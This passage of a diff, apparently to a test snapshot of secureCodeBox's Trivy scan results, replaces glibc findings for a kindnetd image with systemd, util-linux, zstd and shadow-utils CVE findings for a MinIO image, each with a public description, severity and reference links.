'debian'", - "id": "CVE-2021-35942", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", - "https://access.redhat.com/security/cve/CVE-2021-35942", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", - "https://linux.oracle.com/cve/CVE-2021-35942.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", - "https://security.gentoo.org/glsa/202208-24", - "https://security.netapp.com/advisory/ntap-20210827-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", - "https://sourceware.org/glibc/wiki/Security%20Exceptions", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: Arbitrary read in wordexp()", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-35942", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-35942", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", + ], + }, + "category": "Vulnerability", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23218", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23218", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", - "https://linux.oracle.com/cve/CVE-2022-23218.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23218", - "https://www.oracle.com/security-alerts/cpujul2022.html", - ], - }, - "category": "Vulnerability", - "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23218", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23218", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libuuid1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23219", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4899", + "installedVersion": "1.4.8+dfsg-2.1", + "packageName": "libzstd1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23219", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", - "https://linux.oracle.com/cve/CVE-2022-23219.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23219", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2022-4899", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "https://github.com/facebook/zstd/issues/3200", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "https://www.cve.org/CVERecord?id=CVE-2022-4899", ], }, "category": "Vulnerability", - "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", + "name": "buffer overrun in util.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23219", + "value": "https://avd.aquasec.com/nvd/cve-2022-4899", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23219", + "value": "https://access.redhat.com/security/cve/CVE-2022-4899", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", + "value": "https://github.com/facebook/zstd/issues/3200", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1751", - "installedVersion": "2.28-10", - "packageName": "libc6", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1751", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", - "https://linux.oracle.com/cve/CVE-2020-1751.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200430-0002/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: array overflow in backtrace functions for powerpc", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1751", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1751", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "value": "https://ubuntu.com/security/notices/USN-5745-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5745-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1752", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1752", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", - "https://linux.oracle.com/cve/CVE-2020-1752.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", - "https://security.gentoo.org/glsa/202101-20", - "https://security.netapp.com/advisory/ntap-20200511-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: use-after-free in glob() function when expanding ~user", + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1752", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1752", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + }, + { + "type": "URL", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": 